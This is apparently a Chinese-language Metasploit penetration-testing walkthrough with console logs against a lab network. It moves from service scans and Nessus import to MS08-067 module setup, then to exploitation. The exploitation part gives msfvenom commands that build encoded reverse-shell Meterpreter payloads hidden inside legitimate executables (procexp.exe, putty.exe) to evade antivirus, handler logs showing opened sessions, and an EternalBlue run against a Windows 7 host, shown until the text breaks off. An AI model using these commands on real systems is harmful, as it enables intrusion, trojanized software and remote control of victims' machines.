msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ssh/ssh_versionmsf6 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.0.1/24rhost => 192.168.0.1/24msf6 auxiliary(scanner/ssh/ssh_version) > set threads 50threads => 50msf6 auxiliary(scanner/ssh/ssh_version) > run[*] 192.168.0.1/24:22 - Scanned  41 of 256 hosts (16% complete)[*] 192.168.0.1/24:22 - Scanned  53 of 256 hosts (20% complete)[*] 192.168.0.1/24:22 - Scanned  82 of 256 hosts (32% complete)[+] 192.168.0.150:22  - SSH server version: SSH-2.0-OpenSSH_9.0p1 Debian-1 ( service.version=9.0p1 openssh.comment=Debian-1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:9.0p1 os.vendor=Debian os.family=Linux os.product=Linux os.cpe23=cpe:/o:debian:debian_linux:- service.protocol=ssh fingerprint_db=ssh.banner )[*] 192.168.0.1/24:22 - Scanned 103 of 256 hosts (40% complete)[*] 192.168.0.1/24:22 - Scanned 149 of 256 hosts (58% complete)[*] 192.168.0.1/24:22 - Scanned 196 of 256 hosts (76% complete)[*] 192.168.0.1/24:22 - Scanned 197 of 256 hosts (76% complete)[*] 192.168.0.1/24:22 - Scanned 245 of 256 hosts (95% complete)[*] 192.168.0.1/24:22 - Scanned 247 of 256 hosts (96% complete)[*] 192.168.0.1/24:22 - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

FTP掃描

msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ftp/ftp_versionmsf6 auxiliary(scanner/ftp/ftp_version) > set threads 50threads => 50msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24rhost => 192.168.0.1/24msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ftp/ftp_versionmsf6 auxiliary(scanner/ftp/ftp_version) > set threads 50threads => 50msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24rhost => 192.168.0.1/24msf6 auxiliary(scanner/ftp/ftp_version) > run[*] 192.168.0.1/24:21     - Scanned  45 of 256 hosts (17% complete)[*] 192.168.0.1/24:21     - Scanned  55 of 256 hosts (21% complete)[*] 192.168.0.1/24:21     - Scanned  99 of 256 hosts (38% complete)[+] 192.168.0.106:21      - FTP Banner: '220-FileZilla Server version 0.9.41 betax0dx0a220-written by Tim Kosse (Tim.Kosse@gmx.de)x0dx0a220 Please visit http://sourceforge.net/projects/filezilla/x0dx0a'[+] 192.168.0.150:21      - FTP Banner: '220 (vsFTPd 3.0.3)x0dx0a'[*] 192.168.0.1/24:21     - Scanned 104 of 256 hosts (40% complete)[+] 192.168.0.161:21      - FTP Banner: '220 (vsFTPd 2.3.4)x0dx0a'[*] 192.168.0.1/24:21     - Scanned 144 of 256 hosts (56% complete)[*] 192.168.0.1/24:21     - Scanned 154 of 256 hosts (60% complete)[*] 192.168.0.1/24:21     - Scanned 203 of 256 hosts (79% complete)[*] 192.168.0.1/24:21     - Scanned 205 of 256 hosts (80% complete)[*] 192.168.0.1/24:21     - Scanned 253 of 256 hosts (98% complete)[*] 192.168.0.1/24:21     - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completedmsf6 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous msf6 auxiliary(scanner/ftp/anonymous) > set rhost 192.168.0.161rhost => 192.168.0.150msf6 auxiliary(scanner/ftp/anonymous) > run[+] 192.168.0.161:21      - 192.168.0.161:21 - Anonymous READ (220 (vsFTPd 2.3.4))[*] 192.168.0.161:21      - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed結論:192.168.0.161的FTP允許匿名登錄

SNMP掃描

msf6 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/snmp/snmp_loginmsf6 auxiliary(scanner/snmp/snmp_login) > set rhost 192.168.0.1/24rhost => 192.168.0.1/24msf6 auxiliary(scanner/snmp/snmp_login) > set threads 50threads => 50msf6 auxiliary(scanner/snmp/snmp_login) > run[*] Scanned  50 of 256 hosts (19% complete)[*] Scanned  54 of 256 hosts (21% complete)[*] Scanned 100 of 256 hosts (39% complete)[*] Scanned 104 of 256 hosts (40% complete)[*] Scanned 134 of 256 hosts (52% complete)[*] Scanned 157 of 256 hosts (61% complete)[*] Scanned 181 of 256 hosts (70% complete)[*] Scanned 208 of 256 hosts (81% complete)[*] Scanned 231 of 256 hosts (90% complete)[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

ARP 掃描

msf6 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/discovery/arp_sweepmsf6 auxiliary(scanner/discovery/arp_sweep) > optionsModule options (auxiliary/scanner/discovery/arp_sweep):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   INTERFACE                   no        The name of the interface   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit   SHOST                       no        Source IP Address   SMAC                        no        Source MAC Address   THREADS    1                yes       The number of concurrent threads (max one per host)   TIMEOUT    5                yes       The number of seconds to wait for new datamsf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.0.1/24RHOSTS => 192.168.0.1/24msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100THREADS => 100msf6 auxiliary(scanner/discovery/arp_sweep) > run[+] 192.168.0.1 appears to be up (UNKNOWN).[+] 192.168.0.106 appears to be up (UNKNOWN).[+] 192.168.0.150 appears to be up (VMware, Inc.).[+] 192.168.0.151 appears to be up (UNKNOWN).[+] 192.168.0.152 appears to be up (UNKNOWN).[+] 192.168.0.158 appears to be up (UNKNOWN).[+] 192.168.0.159 appears to be up (UNKNOWN).[+] 192.168.0.161 appears to be up (VMware, Inc.).[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

HTTP服務掃描

msf6 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/http_versionmsf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.0.1/24RHOSTS => 192.168.0.1/24msf6 auxiliary(scanner/http/http_version) > set THREADS 100THREADS => 100msf6 auxiliary(scanner/http/http_version) > run[+] 192.168.0.1:80[*] Scanned  44 of 256 hosts (17% complete)[*] Scanned  55 of 256 hosts (21% complete)[*] Scanned  78 of 256 hosts (30% complete)[+] 192.168.0.106:80 Microsoft-HTTPAPI/2.0[*] Scanned 104 of 256 hosts (40% complete)[+] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )[*] Scanned 136 of 256 hosts (53% complete)[*] Scanned 175 of 256 hosts (68% complete)[*] Scanned 187 of 256 hosts (73% complete)[*] Scanned 209 of 256 hosts (81% complete)[*] Scanned 235 of 256 hosts (91% complete)[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

SMB掃描

SMB:SMB(Server Message Block)通信協議是微軟(Microsoft)和英特爾(Intel)在1987年制定的協議,主要是作為Microsoft網絡的通訊協議。SMB 是在會話層(session layer)和表示層(presentation layer)以及小部分應用層(application layer)的協議。

SMB使用了NetBIOS的應用程序接口 (Application Program Interface,簡稱API)。另外,它是一個開放性的協議,允許了協議擴展——使得它變得更大而且復雜;大約有65個最上層的作業,而每個作業都超過120個函數,甚至Windows NT也沒有全部支持到,最近微軟又把 SMB 改名為 CIFS(Common Internet File System),并且加入了許多新的特色。

SMB(全稱是Server Message Block)是一個協議名,它能被用于Web連接和客戶端與服務器之間的信息溝通。SMB最初是IBM的貝瑞·費根鮑姆(Barry Feigenbaum)研制的,其目的是將DOS操作系統中的本地文件接口“中斷13”改造為網絡文件系統

msf6 auxiliary(scanner/http/http_version) > use auxiliary/scanner/smb/smb_versionmsf6 auxiliary(scanner/smb/smb_version) > set THREADS 100THREADS => 100msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.1/24RHOSTS => 192.168.0.1/24msf6 auxiliary(scanner/smb/smb_version) > run[*] 192.168.0.1/24:       - Scanned  39 of 256 hosts (15% complete)[*] 192.168.0.1/24:       - Scanned  60 of 256 hosts (23% complete)[*] 192.168.0.151:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2)[*] 192.168.0.106:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{c4aea85c-fbd7-47a2-b5b5-f6ad41c48b6e}) (authentication domain:DESKTOP-9A8VFKB)[*] 192.168.0.1/24:       - Scanned 104 of 256 hosts (40% complete)[*] 192.168.0.158:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)[+] 192.168.0.158:445     -   Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)[*] 192.168.0.161:445     - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)[*] 192.168.0.161:445     -   Host could not be identified: Unix (Samba 3.0.20-Debian)[*] 192.168.0.1/24:       - Scanned 107 of 256 hosts (41% complete)[*] 192.168.0.1/24:       - Scanned 159 of 256 hosts (62% complete)[*] 192.168.0.1/24:       - Scanned 161 of 256 hosts (62% complete)[*] 192.168.0.1/24:       - Scanned 203 of 256 hosts (79% complete)[*] 192.168.0.1/24:       - Scanned 206 of 256 hosts (80% complete)[*] 192.168.0.1/24:       - Scanned 254 of 256 hosts (99% complete)[*] 192.168.0.1/24:       - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

漏洞掃描

Nexpose

# wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin#chmod a+x NeXposeSetup-Linux64.bin#./NeXposeSetup-Linux64.bin#cd /opt/rapid7/nexpose/nsc#./nsc

https://127.0.0.1:3780/ 登錄頁面出來后就ok了。

Nessus

https://blog.csdn.net/qq_51577576/article/details/123211031

1)https://www.tenable.com/downloads/nessus

2)dpkg -i Nessus-10.2.0-debian9_amd64.deb

3)/bin/systemctl start nessusd.service

或

systemctl start nessusd.service

4)https://127.0.0.1:8834/

5)關閉服務:systemctl stop nessusd.service

6)#gedit /opt/nessus/var/nessus/plugin_feed_info.inc7)添加內容PLUGIN_SET = "202201250216";PLUGIN_FEED = "ProfessionalFeed (Direct)";PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";8)# cd /opt/nessus/var/nessus/# mkdir plugins#cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/var/nessus/plugins/9)更新https://pan.baidu.com/s/11sV9Kk0mbzQkLcXqUKxO_g?pwd=462u#/opt/nessus/sbin/nessuscli update all-2.0-20220209.tar.gzmsf6 > db_connect postgres:123456@127.0.0.1/msf[*] Connected to Postgres data service: 127.0.0.1/msfmsf6 >db_status[*] Connected to msf. Connection type: postgresql. Connection name: local_db_service.msf6 > db_import /home/jerry/jerry_01sqgv.nessus[*] Importing 'Nessus XML (v2)' data[*] Importing host 192.168.0.158[*] Importing host 192.168.0.157[*] Importing host 192.168.0.151[*] Importing host 192.168.0.150[*] Importing host 192.168.0.106[*] Importing host 192.168.0.1[*] Successfully imported /home/jerry/jerry_01sqgv.nessusmsf6 > hosts -c address,svcs,vulnsHosts=====addresssvcs  vulns-----------  -----192.168.0.12 14192.168.0.106  2376192.168.0.150  6 46192.168.0.151  4 28192.168.0.155  3 2192.168.0.157  4 29192.168.0.158  1037

address:IP地址

svcs:探測到的服務數量

vulns:Nessus發現到的漏洞個數

展示所有漏洞

msf6 > vulns

專門漏洞掃描

驗證SMB登錄

msf6 > use auxiliary/scanner/smb/smb_loginmsf6 auxiliary(scanner/smb/smb_login) > show optionsmsf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.0.106-200rhost => 192.168.0.106-200msf6 auxiliary(scanner/smb/smb_login) > set smbuser rootsmbuser => rootmsf6 auxiliary(scanner/smb/smb_login) > set smbupass 123456smbupass => 123456msf6 auxiliary(scanner/smb/smb_login) > ser verbose false[-] Unknown command: sermsf6 auxiliary(scanner/smb/smb_login) > run

掃描開放的VNC空口令

VNC (Virtual Network Console)是虛擬網絡控制臺的縮寫。它是一款優秀的遠程控制工具軟件,由著名的 AT&T 的歐洲研究實驗室開發的。VNC 是在基于 UNIX 和 Linux 操作系統的免費的開源軟件,遠程控制能力強大,高效實用,其性能可以和 Windows 和 MAC 中的任何遠程控制軟件媲美。在 Linux 中,VNC 包括以下四個命令:vncserver,vncviewer,vncpasswd,和 vncconnect。大多數情況下用戶只需要其中的兩個命令:vncserver 和 vncviewer。

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/vnc/vnc_none_authmsf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhost 192.168.0.106-200msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100threads => 100msf6 auxiliary(scanner/vnc/vnc_none_auth) > run

掃描開放的X11服務器

X11也叫做X Window系統,X Window系統 (X11或X)是一種位圖顯示的視窗系統。它是在 Unix 和類Unix 操作系統,以及 OpenVMS 上建立圖形用戶界面的標準工具包和協議,并可用于幾乎所有已有的現代操作系統。

msf6 auxiliary(scanner/vnc/vnc_none_auth) > use auxiliary/scanner/x11/open_x11msf6 auxiliary(scanner/x11/open_x11) > set rhost 192.168.0.106/24rhost => 192.168.0.106/24msf6 auxiliary(scanner/x11/open_x11) > set threads 100threads => 100msf6 auxiliary(scanner/x11/open_x11) > run[*] 192.168.0.106/24:6000 - Scanned  31 of 256 hosts (12% complete)[*] 192.168.0.106/24:6000 - Scanned  53 of 256 hosts (20% complete)[*] 192.168.0.106/24:6000 - Scanned 102 of 256 hosts (39% complete)[-] 192.168.0.157:6000- 192.168.0.157 Access Denied[*] 192.168.0.106/24:6000 - Scanned 105 of 256 hosts (41% complete)[*] 192.168.0.106/24:6000 - Scanned 200 of 256 hosts (78% complete)[*] 192.168.0.106/24:6000 - Scanned 204 of 256 hosts (79% complete)[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)[*] 192.168.0.106/24:6000 - Scanned 254 of 256 hosts (99% complete)[*] 192.168.0.106/24:6000 - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

開啟滲透之旅

msf6常用命令

msf6 >show exploits 顯示所有的攻擊模塊

msf6 > show exploitsExploits========# Name  Disclosure Date  Rank   Check  Description- ---- ---------------  ----   -----  -----------0 exploit/aix/local/ibstat_path  2013-09-24   excellent  Yesibstat $PATH Privilege Escalation1 exploit/aix/local/xorg_x11_server 2018-10-25   great  YesXorg X11 Server Local Privilege Escalation2 exploit/aix/rpc_CMSd_opcode21  2009-10-07   great  No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow3 exploit/aix/rpc_ttdbserverd_realpath   2009-06-17   great  No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)4 exploit/android/adb/adb_server_exec   2016-01-01   excellent  YesAndroid ADB Debug Server Remote Payload Execution5 exploit/android/browser/samsung_knox_smdm_url   2014-11-12   excellent  No Samsung Galaxy KNOX Android Browser RCE6 exploit/android/browser/stagefright_mp4_tx3g_64bit  2015-08-13   normal No Android Stagefright MP4 tx3g Integer Overflow…

msf6 > show auxiliaryAuxiliary=========   # Name Disclosure Date  RankCheck  Description   - ---- ---------------  ---------  -----------0 auxiliary/admin/2wire/xslt_password_reset   2007-08-15normal  No 2Wire Cross-Site Request Forgery Password Reset Vulnerability1 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal  No Android Browser RCE Through Google Play Store XFO2 auxiliary/admin/appletv/appletv_display_image normal  No Apple TV Image Remote Control3 auxiliary/admin/appletv/appletv_display_video normal  No Apple TV Video Remote Control4 auxiliary/admin/atg/atg_clientnormal  No Veeder-Root Automatic Tank Gauge (ATG) Administrative Client…

msf6 > show optionsmsf6 > use auxiliary/scanner/x11/open_x11msf6 auxiliary(scanner/x11/open_x11) > backmsf6 >search mysql

msf6 > search ms08_067Matching Modules================#  Name Disclosure Date  Rank   Check  Description-  ---- ---------------  ----   -----  -----------0  exploit/windows/smb/ms08_067_netapi  2008-10-28   great  YesMS08-067 Microsoft Server Service Relative Path Stack CorruptionInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting  Required  Description---- ---------------  --------  -----------RHOSTSyes   The target host(s), see https://github.com/rapid7/metas   ploit-framework/wiki/Using-MetasploitRPORT445  yes   The SMB service port (TCP)SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name  Current Setting  Required  Description----  ---------------  --------  -----------EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.0.150yes   The listen address (an interface may be specified)LPORT 4444 yes   The listen portExploit target:Id  Name--  ----0   Automatic Targetingmsf>show payloads

顯示某個模塊下的payload

msf6 > use exploit/windows/smb/ms08_067_netapi[*] Using configured payload windows/meterpreter/reverse_tcpmsf6 exploit(windows/smb/ms08_067_netapi) > show payloads

使用某個payload

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf>show targetsmsf6 exploit(windows/smb/ms08_067_netapi) > show targetsExploit targets:   Id  Name   --  ----   0   Automatic Targeting   1   Windows 2000 Universal   2   Windows XP SP0/SP1 Universal   3   Windows 2003 SP0 Universal   4   Windows XP SP2 English (AlwaysOn NX)   5   Windows XP SP2 English (NX)   …   79  Windows 2003 SP2 Russian (NX)   80  Windows 2003 SP2 Swedish (NX)   81  Windows 2003 SP2 Turkish (NX)

顯示更詳細的show targets內容

msf6 exploit(windows/smb/ms08_067_netapi) > infoName: MS08-067 Microsoft Server Service Relative Path Stack CorruptionModule: exploit/windows/smb/ms08_067_netapiPlatform: WindowsArch:Privileged: YesLicense: Metasploit Framework License (BSD)Rank: GreatDisclosed: 2008-10-28Provided by:hdmBrett Moore brett.moore@insomniasec.comfrank2jduckAvailable targets:   Id  Name   --  ----   0   Automatic Targeting   1   Windows 2000 Universal   2   Windows XP SP0/SP1 Universal   3   Windows 2003 SP0 Universal   4   Windows XP SP2 English (AlwaysOn NX)   5   Windows XP SP2 English (NX)   …   79  Windows 2003 SP2 Russian (NX)   80  Windows 2003 SP2 Swedish (NX)   81  Windows 2003 SP2 Turkish (NX)Check supported:  YesBasic options:  Name Current Setting  Required  Description  ---- ---------------  --------  -----------  RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit  RPORT445  yes   The SMB service port (TCP)  SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)Payload information:  Space: 408  Avoid: 8 charactersDescription:  This module exploits a parsing flaw in the path canonicalization   code of NetAPI32.dll through the Server Service. This module is   capable of bypassing NX on some operating systems and service packs.  The correct target must be used to prevent the Server Service (along   with a dozen others in the same process) from crashing. Windows XP   targets seem to handle multiple successful exploitation events, but   2003 targets will often crash or hang on subsequent attempts. This   is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.References:  https://nvd.nist.gov/vuln/detail/CVE-2008-4250  OSVDB (49243)  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.105lhost => 192.168.0.105msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):   Name Current Setting  Required  Description   ---- ---------------  --------  -----------   RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit   RPORT445  yes   The SMB service port (TCP)   SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)Payload options (windows/shell/reverse_tcp):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------   EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)   LHOST 192.168.0.105yes   The listen address (an interface may be specified)   LPORT 4444 yes   The listen portExploit target:   Id  Name   --  ----   0   Automatic Targetingmsf6 exploit(windows/smb/ms08_067_netapi) > unset lhostUnsetting lhost...msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):   Name Current Setting  Required  Description   ---- ---------------  --------  -----------   RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit   RPORT445  yes   The SMB service port (TCP)   SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)Payload options (windows/shell/reverse_tcp):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------   EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)   LHOST  yes   The listen address (an interface may be specified)   LPORT 4444 yes   The listen portExploit target:   Id  Name   --  ----   0   Automatic Targeting

設置所有模塊的lhost

msf6 exploit(windows/smb/ms08_067_netapi) > setg lhost 102.168.0.150lhost => 102.168.0.150msf6 exploit(windows/smb/ms08_067_netapi) > unsetg lhost

免殺技術

msfvenom

Options:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=9999 R > test.apk

躲避殺毒軟件的監測

使用MSF編碼器

 # msfvenom -l encodersFramework Encoders [--encoder]======================================    x86/shikata_ga_nai       excellent  Polymorphic XOR Additive Feedback Encoder    x86/single_static_bit      manual     Single Static Bit    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder    x86/xor_dynamic         normal     Dynamic key XOR Encodermsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

自定義可自行文件模板

wget http://download.sysinternals.com/files/ProcessExplorer.zip(也可以從國內網站上取)

msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload1.exeFound 1 compatible encodersAttempting to encode payload with 10 iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size 381 (iteration=0)x86/shikata_ga_nai succeeded with size 408 (iteration=1)x86/shikata_ga_nai succeeded with size 435 (iteration=2)x86/shikata_ga_nai succeeded with size 462 (iteration=3)x86/shikata_ga_nai succeeded with size 489 (iteration=4)x86/shikata_ga_nai succeeded with size 516 (iteration=5)x86/shikata_ga_nai succeeded with size 543 (iteration=6)x86/shikata_ga_nai succeeded with size 570 (iteration=7)x86/shikata_ga_nai succeeded with size 597 (iteration=8)x86/shikata_ga_nai succeeded with size 624 (iteration=9)x86/shikata_ga_nai chosen with final size 624Payload size: 624 bytesFinal size of exe file: 2661376 bytesSaved as: payload1.exe

將payload1.exe上傳到windows下

# msfconsolemsf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/handler) > set lport 4444lport => 4444msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.0.150:4444[*] Sending stage (175686 bytes) to 192.168.0.106[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:30805) at 2022-06-28 17:03:05 +0800meterpreter > pwdC:UsersxiangDesktop

隱秘地啟動一個攻擊負載

msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -x putty.exe -k -b 'x00x0axff' -i 10 -f exe -o payload2.exeFound 1 compatible encodersAttempting to encode payload with 10 iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size 381 (iteration=0)x86/shikata_ga_nai succeeded with size 408 (iteration=1)x86/shikata_ga_nai succeeded with size 435 (iteration=2)x86/shikata_ga_nai succeeded with size 462 (iteration=3)x86/shikata_ga_nai succeeded with size 489 (iteration=4)x86/shikata_ga_nai succeeded with size 516 (iteration=5)x86/shikata_ga_nai succeeded with size 543 (iteration=6)x86/shikata_ga_nai succeeded with size 570 (iteration=7)x86/shikata_ga_nai succeeded with size 597 (iteration=8)x86/shikata_ga_nai succeeded with size 624 (iteration=9)x86/shikata_ga_nai chosen with final size 624Payload size: 624 bytesFinal size of exe file: 702464 bytesSaved as: payload2.exe

將payload2.exe上傳到windows下

msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/handler) > set lport 4444lport => 4444msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.0.150:4444[*] Sending stage (175686 bytes) to 192.168.0.158[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:50055) at 2022-06-28 17:23:50 +0800meterpreter >

加殼

upx

#upx                       Ultimate Packer for eXecutables                          Copyright (C) 1996 - 2020UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..Commands:  -1     compress faster                   -9    compress better  -d     decompress                      -l    list compressed file  -t     test compressed file                -V    display version number  -h     give more help                   -L    display software licenseoptions:  -q     be quiet                         -v    be verbose  -oFILE write output to 'FILE'  -f     force compression of suspicious files  -k     keep backup filesfile..   executables to (de)compressType 'upx --help' for more detailed help.UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io

開始滲透

利用主機漏洞滲透

利用操作系統漏洞

Windows 7

msf6 > nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24[*] exec: nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 16:07 CSTNmap scan report for 192.168.0.1…Nmap scan report for 192.168.0.158…| smb-vuln-ms17-010:|   VULNERABLE:|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)| State: VULNERABLE| IDs:  CVE:CVE-2017-0143| Risk factor: HIGH…msf6 > search ms17-010Matching Modules================   #  Name  Disclosure Date  Rank Check  Description   -  ----  ---------------  ---- -----  -----------   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14   average  YesMS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption   1  exploit/windows/smb/ms17_010_psexec   2017-03-14   normal   YesMS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution   2  auxiliary/admin/smb/ms17_010_command  2017-03-14   normal   No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution   3  auxiliary/scanner/smb/smb_ms17_010 normal   No MS17-010 SMB RCE Detection   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14   greatYesSMB DOUBLEPULSAR Remote Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rcemsf6 > use 0[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcpmsf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.158rhost => 192.168.0.158msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 192.168.0.150:4444[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)[+] 192.168.0.158:445 - The target is vulnerable.[*] 192.168.0.158:445 - Connecting to target for exploitation.[+] 192.168.0.158:445 - Connection established for exploitation.[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet[*] 192.168.0.158:445 - Starting non-paged pool grooming[+] 192.168.0.158:445 - Sending SMBv2 buffers[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.0.158:445 - Sending final SMBv2 buffers.[*] 192.168.0.158:445 - Sending last fragment of exploit packet![*] 192.168.0.158:445 - Receiving response from exploit packet[+] 